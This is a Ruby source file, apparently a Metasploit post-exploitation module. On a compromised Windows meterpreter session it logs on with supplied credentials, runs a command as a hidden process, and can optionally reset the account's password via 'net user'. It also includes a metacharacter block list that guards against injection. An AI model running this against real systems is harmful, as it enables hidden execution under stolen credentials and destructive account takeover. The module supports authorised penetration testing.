metasploit-framework/modules/exploits/windows/local/run_as.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
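class Metasploit3 < Msf::Exploit::Local
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Exploit::Powershell
  include Msf::Post::Windows::Runas

  # Characters that must not reach the `net user` command line built in
  # reset_pass: a double quote breaks the quoting, the rest are cmd.exe
  # metacharacters. Note that cmd.exe may still expand %VAR% sequences.
  UNSAFE_NET_USER_CHARS = /["&|<>^\r\n]/

  def initialize(info = {})
    super(update_info(info,
      'Name'         => "Windows Manage Run Command As User",
      'Description'  => %q{
        This module will login with the specified username/password and execute the
        supplied command as a hidden process. Output is not returned by default; by setting
        CMDOUT to true output will be redirected to a temp file and read back in to
        display. By setting advanced option SETPASS to true, it will reset the user's
        password and then execute the command.
      },
      'License'      => MSF_LICENSE,
      'Platform'     => ['win'],
      'SessionTypes' => ['meterpreter'],
      'Author'       => ['Kx499'],
      'Targets'      => [ [ 'Universal', {} ] ],
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('DOMAIN', [true, 'Domain to login with']),
        OptString.new('USER', [true, 'Username to login with']),
        OptString.new('PASSWORD', [true, 'Password to login with']),
        OptString.new('APPLICATION_NAME', [false, 'Application to be executed (lpApplicationName)']),
        OptString.new('COMMAND_LINE', [true, 'Command line to execute (lpCommandLine)'])
      ], self.class)

    register_advanced_options(
      [
        OptBool.new('CMDOUT', [true, 'Retrieve command output', false]),
        OptBool.new('SETPASS', [true, 'Reset password', false])
      ], self.class)
  end

  # Returns true when the session holds enough privilege to spawn a process
  # under another account, false otherwise.
  #
  # A SYSTEM token obtained by elevating (getsystem) normally lacks
  # SeAssignPrimaryTokenPrivilege; in that case migrate into a process that
  # was started as SYSTEM. Sets @isadmin to false on the SYSTEM path and to
  # true on the plain-admin path.
  def priv_check
    if is_system?
      privs = session.sys.config.getprivs
      if privs.include?("SeAssignPrimaryTokenPrivilege") && privs.include?("SeIncreaseQuotaPrivilege")
        @isadmin = false
        true
      else
        false
      end
    elsif is_admin?
      @isadmin = true
      true
    else
      false
    end
  end

  # Resets +user+'s password to +password+ via `net user` and returns true when
  # the command reports success.
  #
  # This is destructive (the old password is lost) and noisy: both values are
  # placed on a cmd.exe command line, visible to process auditing / anyone
  # listing processes. Values containing cmd.exe metacharacters are rejected
  # rather than interpolated into the shell command.
  #
  # @raise via fail_with(BadConfig) when user or password is empty or unsafe
  def reset_pass(user, password)
    [user, password].each do |value|
      if value.to_s.empty? || value =~ UNSAFE_NET_USER_CHARS
        fail_with(Exploit::Failure::BadConfig, "USER/PASSWORD is empty or contains characters that cannot be passed safely to net user")
      end
    end

    output = cmd_exec(%Q{cmd.exe /c net user "#{user}" "#{password}"})
    output.to_s.include?("successfully")
  end

  # Logs on as DOMAIN\USER with PASSWORD and launches COMMAND_LINE as a hidden
  # process, optionally resetting the account password first (SETPASS).
  #
  # Uses CreateProcessAsUser when the session is SYSTEM and
  # CreateProcessWithLogon otherwise (both via Msf::Post::Windows::Runas).
  # CMDOUT is accepted but output capture is not implemented in this revision;
  # nothing is read back from the spawned process.
  def exploit
    # Msf::Session#type is the session kind; sysinfo returns a Hash, which has
    # no #type method in Ruby >= 1.9.
    fail_with(Exploit::Failure::BadConfig, "Must be a meterpreter session") unless session.type == "meterpreter"

    # The option is named PASSWORD; reading "PASS" always yielded nil and made
    # every logon attempt fail.
    user             = datastore['USER']
    password         = datastore['PASSWORD']
    domain           = datastore['DOMAIN']
    application_name = datastore['APPLICATION_NAME']
    command_line     = datastore['COMMAND_LINE']

    if datastore['SETPASS']
      print_warning("SETPASS is set: resetting the password of #{domain}\\#{user} (destructive, and it will be logged)")
      fail_with(Exploit::Failure::Unknown, "Failed to reset the password for #{user}") unless reset_pass(user, password)
    end

    print_status("Running '#{command_line}' as #{domain}\\#{user}")

    if is_system?
      # CreateProcessAsUser needs SeAssignPrimaryTokenPrivilege; a token from
      # getsystem usually lacks it, so warn up front rather than fail silently.
      unless priv_check
        print_warning("SYSTEM session lacks SeAssignPrimaryTokenPrivilege/SeIncreaseQuotaPrivilege; " \
                      "migrate to a process that was started as SYSTEM if process creation fails")
      end
      result = create_process_as_user(domain, user, password, application_name, command_line)
    else
      result = create_process_with_logon(domain, user, password, application_name, command_line)
    end

    # The Runas helpers' return shape is not visible here; report it verbatim.
    print_status("Process creation returned: #{result.inspect}")
  end
end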